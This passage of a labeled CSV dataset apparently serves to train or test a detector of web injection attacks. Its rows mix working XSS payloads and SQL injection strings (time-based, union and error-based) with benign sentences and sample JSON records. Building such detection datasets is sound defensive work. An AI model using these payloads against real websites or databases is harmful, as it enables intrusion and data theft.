onfocus=alert(1)></datalist>,1,XSS,4738 "1'|| ( select 'xsoq' from dual where 6690 = 6690 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ) ||'",2,SQLi,11135 <listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus>,1,XSS,2387 outer,3,normal,23120 <u id=x tabindex=1 onbeforeactivate=alert(1)></u>,1,XSS,5761 "-1197"" ) ) as dfsy where 8857 = 8857 or 3038 = 3038",2,SQLi,18367 "1"" ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,19384 "<xmp onmouseout=""alert(1)"">test</xmp>",1,XSS,8683 ") AND ELT(1337=1337,SLEEP(5)) AND (1337"" LIKE ""1337",2,SQLi,18251 "<style>@keyframes x{}</style><img style=""animation-name:x"" onanimationend=""alert(1)""></img>",1,XSS,1736 <svg><animatetransform onbegin=alert(1) attributeName=transform>,1,XSS,2913 "1 ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11435 <svg><strong onload=alert(1)></strong>,1,XSS,8341 <address id=x tabindex=1 onbeforedeactivate=alert(1)></address><input autofocus>,1,XSS,1988 "In the Settings box, select Apps and then Apps & Features.",3,normal,25996 "<IMG DYNSRC=""javascript:javascript:alert(1)"">",1,XSS,6549 "select * from generate_series ( 3990,3990,case when ( 3990 = 9597 ) then 1 else 0 end ) limit 1--",2,SQLi,14267 Where's the desert?,3,normal,23524 <svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2>,1,XSS,2813 "-1526' ) ) or elt ( 1032 = 1032,3623 ) and ( ( 'xpob' = 'xpob",2,SQLi,17067 "A select few, however, don't waste their time with such frivolities.",3,normal,26422 "-2787' union all select 3622,3622,3622,3622,3622,3622,3622,3622,3622,3622#",2,SQLi,15732 "1%' union all select null,null,null,null,null#",2,SQLi,18919 "1%"" ) ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) and ( ( ""%"" = """,2,SQLi,11613 1 ) as oknr where 3228 = 3228,2,SQLi,20693 <u onpointermove=alert(1)>XSS</u>,1,XSS,9342 "Unlike the the Smart Select feature on the Note 7, you don't need to manually select a specific area on the screen to capture.",3,normal,25226 Modify the account information.,3,normal,22713 "1"" ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15111 "-1139 ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11798 <textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus>,1,XSS,1932 Where's the motel?,3,normal,23551 "><script+src=https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378""></script>",1,XSS,199 <hgroup onpointerup=alert(1)>XSS</hgroup>,1,XSS,7780 ")))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19339 <img2 onpointerleave=alert(1)>XSS</img2>,1,XSS,8007 %22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E,1,XSS,2329 <link onreadystatechange=alert(1) rel=stylesheet href=1>,1,XSS,4391 The run is for select dates from June through September.,3,normal,25385 "1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( 'ochr' like 'ochr",2,SQLi,12712 "1"" ) as vdim where 1296 = 1296",2,SQLi,20628 "1 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) )",2,SQLi,11471 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></param>",1,XSS,204 "1 ) and make_set ( 8403 = 8403,8899 )",2,SQLi,19918 <ins id=x tabindex=1 onbeforeactivate=alert(1)></ins>,1,XSS,4933 end and ( ( '%' = ',2,SQLi,21950 Article: Select items up to 20% off (through September 10).,3,normal,26361 "<optgroup onmouseleave=""alert(1)"">test</optgroup>",1,XSS,5793 "1%"" ) ) ) and ( 3020 = 3020 ) *6703 and ( ( ( ""%"" = """,2,SQLi,18115 1 ) where 5774 = 5774,2,SQLi,21587 "-6520%"" ) order by 1#",2,SQLi,21664 "-1150' ) as hdby where 4032 = 4032 union all select 4032,4032,4032,4032,4032,4032,4032,4032,4032,4032--",2,SQLi,13973 He decided to order a classic burger.,3,normal,22954 "<tfoot onmouseover=""alert(1)"">test</tfoot>",1,XSS,7395 <input value=<><iframe/src=javascript:confirm(1),1,XSS,5857 Select end.,3,normal,24590 "<style>:target {color:red;}</style><fieldset id=x style=""transition:color 1s"" ontransitionend=alert(1)></fieldset>",1,XSS,856 1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'vtoi' like 'vtoi,2,SQLi,13901 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 6051 = 6051",2,SQLi,14579 "<del onbeforecut=""alert(1)"" contenteditable>test</del>",1,XSS,4739 "{""id"":null,""firstName"":""Demi"",""lastName"":""Chew"",""address"":""57254 Brickell Ave #372"",""city"":""808"",""telephone"":""3308716573""}",3,normal,27019 1'|| ( select 'puco' where 2605 = 2605 union all select null#,2,SQLi,17106 1'+ ( select wpkh where 5842 = 5842,2,SQLi,20104 "><script+src=https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)""></script>",1,XSS,1638 Where did you spot that unique sculpture from?,3,normal,23706 I'm considering where to attend a workshop.,3,normal,23980 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))",2,SQLi,11673 "1 or elt ( 6272 = 6272,sleep ( 5 ) )",2,SQLi,19989 if ( 2823 = 3532 ) select 2823 else drop function kmqw--,2,SQLi,17699 "<figure onmouseenter=""alert(1)"">test</figure>",1,XSS,6588 "1"" and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13832 select * from users where id = 1 <@$_ or 1 = 1 -- 1,2,SQLi,18261 end and ( ( ( '%' = ',2,SQLi,21647 -8274' ) ) union all select 3048--,2,SQLi,20171 "<figure onbeforecopy=""alert(1)"" contenteditable>test</figure>",1,XSS,3306 "1' and 1 = ( select count ( * ) from tablenames ) , --",2,SQLi,17903 <svg><picture onload=alert(1)></picture>,1,XSS,7997 "<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS",1,XSS,2000 "&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\""javascript&#058;alert('XSS')\"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;",1,XSS,665 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 5432 = 5432",2,SQLi,13569 "<legend onkeypress=""alert(1)"" contenteditable>test</legend>",1,XSS,3750 -1470' ) ) ) or 9323 = 9323#,2,SQLi,20825 "<nav onkeyup=""alert(1)"" contenteditable>test</nav>",1,XSS,5532 1 where 3744 = 3744,2,SQLi,21990 "These illustrations are comparatively simple; it would have been easy to select others of a more complicated nature, but all evidently connected with the visits of insects and the cross fertilization of the flower.",3,normal,25327 "<abbr oncontextmenu=""alert(1)"">test</abbr>",1,XSS,7529 "</stylesheet>//[""'`-->]]>]</div>",1,XSS,9477 "or 1=1 or ""=",2,SQLi,22280 "&lt;IMG SRC=\""mocha&#58;&#91;code&#93;\""&gt;",1,XSS,6779 "<audio autoplay controls onvolumechange=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,1308 I need to decide where to have our picnic.,3,normal,23818 "{""id"":null,""name"":""flame class""}",3,normal,27096 "-1868"" ) where 9495 = 9495 or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11518 1 where 6173 = 6173,2,SQLi,22007 "1' in boolean mode ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) #",2,SQLi,15731 "1 ) as tgqd where 6369 = 6369 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10254 Funan continues in screenings at select theaters nationwide this summer.,3,normal,26156 -8729'+ ( select 'nbzl' where 7160 = 7160 order by 1#,2,SQLi,18071 "1%"" and 1343 = 5939#",2,SQLi,21865 "1' ) ) as ovbz where 3203 = 3203 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10197 "-6496"" ) as obnf where 2903 = 2903 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,16181 "{""id"":null,""name"":""Gastly""}",3,normal,27560 "<param onbeforecopy=""alert(1)"" contenteditable>test</param>",1,XSS,3629 select ( case when ( 4636 = 1108 ) then 1 else 4636* ( select 4636 from master..sysdatabases ) end ) --,2,SQLi,13955 "></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,2695 "1%' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( '%' = '",2,SQLi,11276 "1' ) as wtfo where 5666 = 5666 union all select null,null,null,null--",2,SQLi,16336 top['al\x65rt'](1),1,XSS,9792 "1"" ) as fkco where 8877 = 8877 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10945 "1 ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( 3023 = 3023",2,SQLi,10841 %27 or 1 = 1,2,SQLi,22333 """) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19565 =+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+,2,SQLi,9918 "-7271' ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( 'mdtw' = 'mdtw",2,SQLi,16222 Update page.,3,normal,23094 "<div draggable=""true"" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable>drop here</figure>",1,XSS,1061 "-6076"" ) ) or 8277 = 4757",2,SQLi,21050 -1643' where 1968 = 1968 or 3484 = 6642,2,SQLi,19650 "<style>@keyframes x{}</style><sup style=""animation-name:x"" onanimationstart=""alert(1)""></sup>",1,XSS,1680 Index columns where valid.,3,normal,23318 "<address onmouseover=""alert(1)"">test</address>",1,XSS,6376 [clickme](vbscript:alert(document.domain)),1,XSS,7577 1%' ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( '%' = ',2,SQLi,14844 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) --,2,SQLi,18165 0 or 1 = 1,2,SQLi,22437 "1' ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'sied' = 'sied",2,SQLi,12407 end and 'wdce' = 'wdce,2,SQLi,21531 <scr&#x9ipt>alert('XSS')</scr&#x9ipt>,1,XSS,8758 I need to select the right music for the party.,3,normal,23834 "1%' ) union all select null,null,null,null#",2,SQLi,19198 "1"" where 1452 = 1452 union all select null,null,null,null--",2,SQLi,17271 1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( 'ayol' = 'ayol,2,SQLi,15958 Select the ideal solution.,3,normal,24284 "select * from users where id = 1 or ""1]"" or 1 = 1 -- 1",2,SQLi,17892 Filter data where needed.,3,normal,23461 Select a method to unwind.,3,normal,24147 (sleep 5)--,2,SQLi,22395 "1"" ) where 4520 = 4520",2,SQLi,21549 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></title>",1,XSS,208 -6757' ) ) ) or 4524 = 3696,2,SQLi,20901 Fetch information where required.,3,normal,23364 The age of a child will greatly affect which gift you select for them.,3,normal,25490 "1"" or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""xqgt"" like ""xqgt",2,SQLi,12709 <hgroup onpointerenter=alert(1)>XSS</hgroup>,1,XSS,6913 "<script>Object.prototype.whiteList = {img: ['onerror', 'src']}</script><script>document.write(filterXSS('<img src onerror=alert(1)>'))</script>",1,XSS,504 He selected a restaurant to celebrate his birthday.,3,normal,23811 -6014' ) ) or ( 9860 = 4848 ) *4848 and ( ( 'qtge' = 'qtge,2,SQLi,17436 "1"" ) ) as osuh where 8809 = 8809",2,SQLi,20248 declare @q nvarchar ( 200 ) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q ),2,SQLi,13797 "<div onmouseleave=""alert(1)"">test</div>",1,XSS,8113 "-7580' ) ) as mmqt where 3468 = 3468 union all select 3468,3468,3468,3468,3468,3468#",2,SQLi,14972 `'><script>\xE2\x80\x88javascript:alert(510)</script>,1,XSS,5058 javascript:alert(''),1,XSS,9765 Select disagree.,3,normal,24580 "1' ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 'qvrd' = 'qvrd",2,SQLi,10989 select pg_sleep ( 5 ) and ( ( 'rnzp' = 'rnzp,2,SQLi,19139 "The king was indeed the president of the permanent council, but he could not summon the diet without its consent, and in all cases of preferment was bound to select one out of three of the council's nominees.",3,normal,25424 "1"" ) ) as frsd where 6475 = 6475 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14063 "1' ) as mvai where 5856 = 5856 and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,11861 "<a href=""javascript\x09:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2456 Where's the personal trainer?,3,normal,23641 "-9676 or elt ( 1032 = 1032,3623 ) # jcaq",2,SQLi,19512 "1 ) ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15289 "1%' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and '%' = '",2,SQLi,13091 "<head onmouseup=""alert(1)"">test</head>",1,XSS,8395 Sort the color-coded folders.,3,normal,22704 "-4418"" or 6872 = 6872 and ""gbut"" = ""gbut",2,SQLi,19507 <noscript onpointerover=alert(1)>XSS</noscript>,1,XSS,6186 "{""id"":null,""name"":""changing coat""}",3,normal,27137 "<source onbeforecut=""alert(1)"" contenteditable>test</source>",1,XSS,3563 <slot id=x tabindex=1 onfocusin=alert(1)></slot>,1,XSS,5894 1 ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( 6062 = 6062,2,SQLi,12690 "1 ) ) as gdcg where 2329 = 2329 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14010 "<style>@keyframes slidein {}</style><html style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></html>",1,XSS,393 "<isindex onmouseout=""alert(1)"">test</isindex>",1,XSS,6739 and 1=0) union all,2,SQLi,22033 "<slot onpaste=""alert(1)"" contenteditable>test</slot>",1,XSS,5260 "-3209'+ ( select ldum where 9912 = 9912 union all select 9912,9912,9912,9912#",2,SQLi,15446 "He is entitled to consecrate all the bishops within his province and was formerly entitled, upon consecrating a bishop, to select a benefice within his diocese at his option for one of his chaplains, but this practice was indirectly abolished by 3 and 4 Vict.",3,normal,26122 <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>,1,XSS,2697 "<a href=""\xE2\x80\x85javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2029 "1"" where 9461 = 9461",2,SQLi,21878 <ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus>,1,XSS,2570 "<link onmousedown=""alert(1)"">test</link>",1,XSS,8009 "1 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,16240 "select * from users where id = '1' union select $ _,@@VERSION -- 1'",2,SQLi,16472 -2749' ) as fiho where 3531 = 3531 or 2777 = 1485#,2,SQLi,18470 <body onhashchange=alert(1)><a href=#x>click this!#x,1,XSS,5278 "<small onmouseenter=""alert(1)"">test</small>",1,XSS,7211 Yoox: 60 percent off select merchandise from July 5 – 6.,3,normal,25110 <map onpointermove=alert(1)>XSS</map>,1,XSS,8574 "<frameset onmouseup=""alert(1)"">test</frameset>",1,XSS,6333 1 WAITFOR DELAY '0:0:5',2,SQLi,21274 "1"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and ( ( ( ""mmsh"" = ""mmsh",2,SQLi,12209 "-7559"" or 8792 = 6905--",2,SQLi,21302 <svg><cite onload=alert(1)></cite>,1,XSS,9271 "-8419 ) where 8692 = 8692 union all select 8692,8692,8692--",2,SQLi,17286 <button onDragEnd=javascript:alert(1)>,1,XSS,8532 Select the perfect angle.,3,normal,24342 Specify criteria where needed.,3,normal,23289 Carefully select your items.,3,normal,24318 Insert the note.,3,normal,22865 Select the ideal spot.,3,normal,24295 "<style>:target {color:red;}</style><keygen id=x style=""transition:color 1s"" ontransitionend=alert(1)></keygen>",1,XSS,1018 "Macy's didn't forget about the guys, either: they can stay stylin' with 60% off select men's outerwear, 40% off men's Levi's jeans, and 50% off select men's shoes.",3,normal,25902 <meter onpointermove=alert(1)>XSS</meter>,1,XSS,7632 "1 ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 9841 = 9841",2,SQLi,11558 "<style>:target {color: red;}</style><area id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></area>",1,XSS,997 "{""id"":null,""firstName"":""Toh"",""lastName"":""Munsing"",""address"":""1420 MCCARTHY BLVD, NEW BERN NC 28562"",""city"":""801"",""telephone"":""5249204893""}",3,normal,26840 "<ins onbeforepaste=""alert(1)"" contenteditable>test</ins>",1,XSS,4299 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></content>",1,XSS,163 "<kbd onkeyup=""alert(1)"" contenteditable>test</kbd>",1,XSS,5677 "<strong onmouseover=""alert(1)"">test</strong>",1,XSS,6876 "1"" ) ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13014 "?page=javascript:alert(1)""",1,XSS,9695 "<img oncontextmenu=""alert(1)"">test</img>",1,XSS,7992 "1"" ) ) as mvxa where 3024 = 3024",2,SQLi,20251 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#",2,SQLi,13441 1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,10829 "1 ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11677 "<style>:target {color:red;}</style><source id=x style=""transition:color 1s"" ontransitionend=alert(1)></source>",1,XSS,1023 "1"" ) where 2657 = 2657 and 5309 = 7592--",2,SQLi,19481 Where did you find that cozy coffee shop?,3,normal,23981 <rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus>,1,XSS,3945 "<style>@keyframes x{}</style><main style=""animation-name:x"" onanimationstart=""alert(1)""></main>",1,XSS,1587 "{""id"":14217,""firstName"":""jmeter"",""lastName"":""jmeter"",""address"":""used in jmeter test (DO NOT DELETE)"",""city"":""jmeter"",""telephone"":""12345678""}",3,normal,26814 <dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus>,1,XSS,3154 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",2,SQLi,14565 <label onpointerup=alert(1)>XSS</label>,1,XSS,8229 "1"" ) as rbgl where 3822 = 3822 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) --",2,SQLi,12230 "1"" ) where 5197 = 5197 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,17183 "{""id"":null,""name"":""Togekiss""}",3,normal,27415 "-7043"" ) where 9755 = 9755 union all select 9755,9755,9755,9755,9755,9755#",2,SQLi,15811 High Fashion Home:High Fashion Home is offering 21% off select items.,3,normal,26105 Where's the waterfall?,3,normal,23525 or 1=1 limit 1 -- -+,2,SQLi,21901 Order a cheesy pizza.,3,normal,22661 "Inspired by Le Select in Paris, The Select in Sandy Springs, Georgia, aims to create a welcoming atmosphere where diners can truly feel at home.",3,normal,25990 Calculate totals where needed.,3,normal,23467 <picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus>,1,XSS,2614 I need to decide where to plant the garden.,3,normal,23939 "1%' ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( '%' = '",2,SQLi,11040 "1"" ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ""ffcf"" like ""ffcf",2,SQLi,10257 "<base onmouseup=""alert(1)"">test</base>",1,XSS,8436 "1' ) where 8125 = 8125 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10277 "1' ) ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ( 'zxrb' = 'zxrb",2,SQLi,10579 "<rt onmouseover=""alert(1)"">test</rt>",1,XSS,8795 "1"" ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ""vdyr"" = ""vdyr",2,SQLi,10651 1' where 4945 = 4945,2,SQLi,21808 "-5728 ) where 8663 = 8663 union all select 8663,8663,8663,8663,8663,8663,8663,8663,8663,8663#",2,SQLi,14526 "<menu onclick=""alert(1)"">test</menu>",1,XSS,8841 "<command onkeyup=""alert(1)"" contenteditable>test</command>",1,XSS,3892 "<progress onpaste=""alert(1)"" contenteditable>test</progress>",1,XSS,3558 "1 ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )",2,SQLi,11418 "select * from users where id = 1 or "".#"" or 1 = 1 -- 1",2,SQLi,17936 "<div draggable=""true"" contenteditable>drag me</div><base ondrop=alert(1) contenteditable>drop here</base>",1,XSS,1269 Select a strategy for the game.,3,normal,24160 <link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;,1,XSS,1901 "iif ( 3447 = 1084,1,1/0 )",2,SQLi,21072 "<acronym draggable=""true"" ondragenter=""alert(1)"">test</acronym>",1,XSS,3007 "1 and elt ( 1210 = 1210,sleep ( 5 ) ) # macc",2,SQLi,19142 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></nextid>",1,XSS,191 A snowblower buying guide can help you select the right snowblower for your particular needs.,3,normal,26434 Select the language you want to use for closed captions.,3,normal,25596 "<blockquote onkeydown=""alert(1)"" contenteditable>test</blockquote>",1,XSS,2749 -9225 ) or ( 8258 = 2726 ) *2726 and ( 9900 = 9900,2,SQLi,18455 Select your dream house.,3,normal,24275 ( case when 8422 = 8452 then 1 else null end ),2,SQLi,18966 Schumer before the Joint Select Committee reconvenes on Thursday morning.,3,normal,25707 <del onpointerover=alert(1)>XSS</del>,1,XSS,8669 "<dl oncut=""alert(1)"" contenteditable>test</dl>",1,XSS,6398 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#,2,SQLi,19793 "1%"" ) ) ) and 3116 = 9088#",2,SQLi,20969 "select * from users where id = 1 or "" ) {"" or 1 = 1 -- 1",2,SQLi,17592 <bdo id=x tabindex=1 onfocusin=alert(1)></bdo>,1,XSS,6422 `'><script>\xE2\x80\x82javascript:alert(532)</script>,1,XSS,5053 `'><script>\xE2\x80\x8Ajavascript:alert(1)</script>,1,XSS,5313 "<a href=""\x14javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2435 Where should I insert data?,3,normal,23375 "{""id"":null,""firstName"":""Willie"",""lastName"":""Lam"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27250 "<style>:target {color: red;}</style><details id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></details>",1,XSS,771 "<style>@keyframes x{}</style><img style=""animation-name:x"" onanimationstart=""alert(1)""></img>",1,XSS,1687 <big onpointerleave=alert(1)>XSS</big>,1,XSS,8325 1 ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ),2,SQLi,16047 "1%' ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11387 "1"" ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ""kssm"" = ""kssm",2,SQLi,14447 1 where 2301 = 2301,2,SQLi,21993 "&lt;IMG SRC=\""jav&#x09;ascript&#058;alert('XSS');\""&gt;",1,XSS,4428 "-1947 union all select 7780,7780,7780,7780,7780,7780,7780,7780#",2,SQLi,16874 <img src=x:alert(alt) onerror=eval(src) alt=0>,1,XSS,6267 ) or ('1'='1'/*,2,SQLi,22150 "1'+ ( select pxrg where 5589 = 5589 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11308 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))",2,SQLi,11988 "1%"" ) and 8715 = 5529",2,SQLi,21606 "<input onbeforecopy=alert(1) value=""XSS"" autofocus>",1,XSS,5392 "<style>:target {color:red;}</style><multicol id=x style=""transition:color 1s"" 